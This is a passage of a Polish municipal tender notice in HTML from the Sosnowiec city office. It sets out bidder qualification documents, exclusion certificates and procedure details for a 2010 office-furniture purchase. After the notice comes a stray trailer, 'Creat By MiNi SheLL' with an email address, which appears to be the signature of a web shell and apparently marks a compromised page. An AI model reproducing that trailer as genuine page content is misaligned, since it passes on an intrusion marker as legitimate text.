5a Dokumenty potwierdzające, że dostawy te w okresie ostatnich trzech lat (licząc wstecz od terminu składania ofert, a jeżeli okres prowadzenia działalności był krótszy to tylko 
z tego okresu) zostały wykonane należycie.( np.: listy referencyjne lub inne ).
6.W celu potwierdzenia spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia należy załączyć oświadczenie w trybie art. 22 ust 1 pkt 1, 2, 3 ustawy Prawo zamówień publicznych (załącznik nr 3 do SIWZ) złożone pod rygorem odpowiedzialności karnej za fałszywe zeznania zgodnie z art. 233§1 Kodeksu karnego oraz art. 297 § 1 Kodeksu karnego - odpowiedzialność za poświadczenie nieprawdy w dokumentach w celu uzyskania zamówienia publicznego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>6 W celu potwierdzenia spełnienia warunku znajdowania się w sytuacji ekonomicznej
 i finansowej zapewniającej wykonanie zamówienia należy załączyć oświadczenie 
w trybie art. 22 ust 1 pkt 1, 2, 3 ustawy Prawo zamówień publicznych (załącznik nr 3 do SIWZ) złożone pod rygorem odpowiedzialności karnej za fałszywe zeznania zgodnie z art. 233§1 Kodeksu karnego oraz art. 297 § 1 Kodeksu karnego - odpowiedzialność za poświadczenie nieprawdy w dokumentach w celu uzyskania zamówienia publicznego.
OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIENIA WARUNKÓW UDZIAŁU Z ART 22 UST 1 USTAWY PRAWO ZAMÓWIEŃ PUBLICZNYCH:
Potwierdzeniem spełnienia warunków udziału z art. 22 ustawy ust. 1 ustawy Prawo zamówień publicznych będzie załączenie do oferty dokumentów szczegółowo określonych przez Zamawiającego w punkcie VI podpunkcie, b str. 10 Specyfikacji Istotnych Warunków Zamówienia, zawierających informacje potwierdzające stan faktyczny na dzień otwarcia ofert. Każdy załączony dokument będzie badany zgodnie z zasadą spełnia, nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Załączenie do oferty proponowanego w niej kontenera, fotela obrotowego i krzesła wyściełanego w naturze oraz wzory tapicerki foteli obrotowych i krzeseł drewnianych wyściełanych w odcieniu brązowym i beżowym.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano  wyboru wykonawcy pod warunkiem ,że zaistniały takie okoliczności ,których w zaden sposób nie można było przewidzieć 
w chwili zawarcia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.um.sosnowiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Sosnowcu
Wydział Administracyjno-Gospodarczy
al. Zwycięstwa 20, pokój 502 D
41-200 Sosnowiec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.02.2010 godzina 10:00, miejsce: Urząd Miejski w Sosnowcu
Wydział Administracyjno-Gospodarczy
al. Zwycięstwa 20, pokój 502 D
41-200 Sosnowiec.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com